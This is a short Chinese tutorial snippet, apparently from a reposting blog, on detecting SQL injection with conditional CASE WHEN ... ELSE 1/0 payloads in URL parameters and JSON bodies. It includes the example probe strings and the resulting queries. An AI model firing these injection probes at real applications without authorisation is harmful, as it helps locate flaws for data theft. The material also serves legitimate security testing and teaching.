方法一:CASE WHEN...THEN...ELSE...END的使用
尝试语句格式:id=-1 ||(CASE WHEN 1 like 1 THEN 1 ELSE 1/0 END) &
当json格式传参时尝试:{"name":"test","id":"-1'||(CASE WHEN 1 LIke 1 THEN 1 ELSE 1/0 END)||'","address":"北京"}//正常
select * from tb_user where id=-1||(CASE WHEN 1 like 1 THEN 1 ELSE 1/0 END);//正常select * from tb_user where id=-1||(CASE WHEN 1 like 2 THEN 1 ELSE 1/0 END);//不正常当-1 ||(CASE WHEN 1 like 1 THEN 1 ELSE 1/0 END) 被带入查询的时候,就如果该语句正常返回id为1的信息,则说明存在注入。WHEN Like 2 为异常查询,前面为假,后面也为假,故查不到信息。
8288分类目录声明:本站部分文章来源于网络,版权属于原作者所有。如有转载或引用文章/图片涉及版权问题,请联系我们处理.我们将在第一时间删除!
联系邮箱:tsk@qq.com
